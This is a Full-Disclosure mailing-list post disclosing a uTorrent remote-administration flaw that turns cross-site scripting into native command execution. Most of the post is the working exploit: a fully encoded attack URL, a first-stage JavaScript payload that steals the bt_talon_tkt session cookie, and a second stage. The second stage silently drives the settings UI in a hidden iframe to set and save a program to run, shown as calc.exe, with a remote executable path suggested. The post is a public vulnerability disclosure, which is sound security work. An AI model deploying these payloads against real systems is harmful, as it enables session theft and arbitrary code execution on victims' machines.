Tavis Ormandy <[email protected]> wrote:
> Justin Klein Keane <[email protected]> wrote:
> >
> > Impact
> > ------
> > Clients loading a maliciously crafted .torrent file into
> > Transmission and viewing the web client could be subject to arbitrary
> > script injection, allowing an attacker to run arbitrary code in the
> > context of the victim's web browser. This could lead to privacy
> > compromises (such as if the script "phoned home" to another URL with
> > client information) or client side attacks (such as drive by downloads).
> >
>
> I was just looking at a similar package for Windows called utorrent. They
> relay the remote administration through a third party, presumably to help
> non-technical users understand NAT traversal.
>
> Similar problems exist, but you can use it to set configuration options
> that result in command execution. I guess this problem is public as their
> contact address is a public bug tracking system (mea culpa).
>
> I have a working demo for command execution, email me off-list if you want
> it (I'm reluctant to send too much information about windows software to
> the list, as journalists tend to abuse it, email me if you need
> specifics).
>
> Tavis.
>
Too many requests, I've included details below. Don't get too excited, it's
not very interesting. I suppose it's worth documenting as another example of
XSS to native code execution, although it's more academic than a realistic
threat as nobody is likely to use this with an expectation of security.

The problem is that any XSS on remote.utorrent.com (or presumably if you're a
mitm with sslstrip) is equivalent to code execution if the "remote" option has
been enabled in the preferences dialog (assuming the user is logged in, of
course). As with any non-trivial web application, these are not difficult to
find, even for non-web specialists like me.

Once you have an XSS, exploitation is relatively straightforward:

- Read the bt_talon_tkt cookie from remote.utorrent.com
- Resolve the ticket to a raptor using XHR to
  'https://remote.utorrent.com/talon/getinfo?bt_talon_tkt=' + encodeURIComponent(ticket);
- Exploit the same XSS on the raptor, allowing you to interact with the
  application.

The most obvious attack is to set the "state_cmd" option to whatever command
you require (I assume \\remotehost\whatever.exe will work via the webdav
redirector, but I didn't test it).
Here is the demo I sent to the vendor, I don't know if it works for all cases:

https://remote.utorrent.com/send?btih=DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF&dn=ignored&message=';eval(unescape(document.location.hash.substring(1)));//#var%20ticket%3Bdocument.cookie.split%28%27%3B%27%29.forEach%28function%28cookie%29%7Bticket%3Dcookie.indexOf%28%27bt_talon_tkt%27%29%21%3D-1%3FencodeURIComponent%28cookie.split%28unescape%28%27%2522%27%29%29%5B1%5D%29%3Aticket%7D%29%3Bx%3Dnew%20XMLHttpRequest%28%29%3Bx.open%28%27GET%27%2C%27/talon/getinfo%3Fbt_talon_tkt%3D%27+ticket%2Cfalse%29%3Bx.send%28%29%3Braptor%3Deval%28%27%28%27%20+%20x.responseText%20+%20%27%29%27%29.raptor%3Bdocument.location%3Draptor.replace%28%27http%3A%27%2C%27https%3A%27%29.replace%28%279090%27%2C%279000%27%29+unescape%28%27/send%253Fbtih%253DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%2526dn%253Dignored%2526message%253D%2527%253Beval%2528unescape%2528document.location.hash.substring%25281%2529%2529%2529%253B//%2523f%25253Ddocument.createElement%252528%252527IFRAME%252527%252529%25253Bf.src%25253D%252527/talon/gui%25253Futorrent%25253D1%252527%25253Bdocument.body.appendChild%252528f%252529%25253BsetTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.uki%252528%252527%252523toolbar_preferences%252527%252529.trigger%252528%252527mousedown%252527%25252C%252520%25257Bwhich%252520%25253A%2525201%25257D%252529%252520%25257D%25252C%2525205000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.utWebUI.stpanes.show%252528%252527dlgSettings-RunProgram%252527%252529%252520%25257D%25252C%2525206000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.document.getElementById%252528%252527state_cmd%252527%252529.value%25253D%252527C%25253A%25255C%25255CWINDOWS%25255C%25255CSYSTEM32%25255C%25255CCALC.EXE%252527%252520%25257D%25252C%2525207000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.document.getElementById%252528%252527DLG_SETTINGS_SAVE%252527%252529.click%252528%252529%25253B%252520%25257D%25252C%2525208000%252529%25253B%27%29%3B

Wait a few seconds, then check the preferences pane of the client to see if
the new setting has been set.

The escaped text is the following inelegant code:

Stage 1 payload:

    // Pull the bt_talon_tkt session cookie (value is double-quoted, so split on '"').
    var ticket;
    document.cookie.split(';').forEach(function (cookie) {
        ticket = cookie.indexOf('bt_talon_tkt') != -1
            ? encodeURIComponent(cookie.split(unescape('%22'))[1])
            : ticket
    });
    // Resolve the ticket to the "raptor" host with a synchronous XHR.
    x = new XMLHttpRequest();
    x.open('GET', '/talon/getinfo?bt_talon_tkt=' + ticket, false);
    x.send();
    raptor = eval('(' + x.responseText + ')').raptor;
    // Navigate to the same /send XSS on the raptor, carrying stage 2 in the fragment.
    document.location = raptor.replace('http:', 'https:').replace('9090', '9000')
        + unescape('/send%3Fbtih%3DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%26dn%3Dignored%26message%3D%27%3Beval%28unescape%28document.location.hash.substring%281%29%29%29%3B//%23f%253Ddocument.createElement%2528%2527IFRAME%2527%2529%253Bf.src%253D%2527/talon/gui%253Futorrent%253D1%2527%253Bdocument.body.appendChild%2528f%2529%253BsetTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.uki%2528%2527%2523toolbar_preferences%2527%2529.trigger%2528%2527mousedown%2527%252C%2520%257Bwhich%2520%253A%25201%257D%2529%2520%257D%252C%25205000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.utWebUI.stpanes.show%2528%2527dlgSettings-RunProgram%2527%2529%2520%257D%252C%25206000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527state_cmd%2527%2529.value%253D%2527C%253A%255C%255CWINDOWS%255C%255CSYSTEM32%255C%255CCALC.EXE%2527%2520%257D%252C%25207000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527DLG_SETTINGS_SAVE%2527%2529.click%2528%2529%253B%2520%257D%252C%25208000%2529%253B');

Stage 2 payload:

    // Load the web UI in a hidden frame on the raptor, then drive its widgets.
    f = document.createElement('IFRAME');
    f.src = '/talon/gui?utorrent=1';
    document.body.appendChild(f);
    // Open the preferences toolbar button.
    setTimeout(function () {
        f.contentDocument.window.uki('#toolbar_preferences').trigger('mousedown', {which : 1})
    }, 5000);
    // Switch to the "Run Program" settings pane.
    setTimeout(function () {
        f.contentDocument.window.utWebUI.stpanes.show('dlgSettings-RunProgram')
    }, 6000);
    // Set the command run on torrent state change.
    setTimeout(function () {
        f.contentDocument.window.document.getElementById('state_cmd').value = 'C:\\WINDOWS\\SYSTEM32\\CALC.EXE'
    }, 7000);
    // Save the settings.
    setTimeout(function () {
        f.contentDocument.window.document.getElementById('DLG_SETTINGS_SAVE').click();
    }, 8000);

I'm sure javascript programmers will cringe at my code, my apologies.

Tavis.

-- 
-------------------------------------
[email protected] | pgp encrypted mail preferred
-------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
